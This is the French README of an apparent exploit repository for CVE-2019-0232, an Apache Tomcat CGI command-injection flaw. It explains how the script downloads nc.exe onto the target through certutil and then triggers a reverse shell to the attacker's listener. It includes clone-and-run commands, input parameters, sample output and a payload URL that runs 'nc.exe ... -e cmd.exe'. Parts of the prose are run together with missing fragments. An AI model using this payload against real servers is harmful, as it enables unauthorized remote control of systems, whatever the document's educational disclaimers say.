
Salut, ceci est un code révisé et amélioré pour CVE-2019-0232
Ce script exploite la vulnérabilité CVE-2019-0232 dans Apache Tomcat, qui permet l'exécution de code à distance via une gestion inappropriée du script ism.bat. Le script utilise une technique de reverse shell avec certutil et nc.exe (Netcat) pour obtenir un accès distant au système vulnérable.
ism.bat qui pourrait permettre à des attaquants d'exécuter des commandes arbitraires sur le serveur. Cette vulnérabilité survient en raison d'une absence de validation appropriée des entrées utilisateur, permettant aux attaquants de déclencher l'exécution de commandes arbitraires via une requête spécialement conçue.nc.exe malveillant depuis un serveur distant et l'utiliser pour générer un reverse shell.nc.exe) doit être hébergé sur un serveur pour la connexion reverse shell.nc.exe : Le script envoie une requête spécialement conçue au serveur Tomcat vulnérable pour télécharger le fichier nc.exe (Netcat) sur la machine cible à l'aide de certutil.nc.exe téléchargé, une autre requête est envoyée pour exécuter la commande reverse shell, qui se connecte à l'écouteur Netcat de l'attaquant.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
Une fois exécuté avec succès, vous devriez avoir une connexion reverse shell vers votre écouteur Netcat.
Ce script est destiné uniquement à des fins éducatives. Ne l'utilisez pas pour des activités malveillantes. Obtenez toujours une autorisation appropriée avant de tenter un test d'intrusion ou un audit de sécurité. Une mauvaise utilisation de ce script pourrait entraîner des conséquences juridiques.
Assurez-vous que le serveur Apache Tomcat n'est pas corrigé contre CVE-2019-0232 avant d'utiliser cet exploit. Le script peut nécessiter des privilèges administratifs en fonction de la configuration du système cible.
Auteur : A!Z3N(Dharan) Fait avec puissance !
Ce projet est sous licence MIT.
Cependant, utilisez-le à vos propres risques. Ce code est fourni uniquement à des fins éducatives. En utilisant ce code, vous acceptez d'assumer l'entière responsabilité des actions découlant de son utilisation. Une utilisation abusive ou non autorisée de cet exploit peut entraîner des conséquences juridiques. Obtenez toujours une autorisation appropriée avant d'effectuer des tests de sécurité ou des tests d'intrusion sur un quelconque système.
Vous êtes libre d'utiliser, de modifier et de distribuer ce code, mais uniquement à des fins éthiques. L'auteur n'est pas responsable des dommages causés par ce code.
N'utilisez pas cet exploit sans l'autorisation explicite du propriétaire du système cible.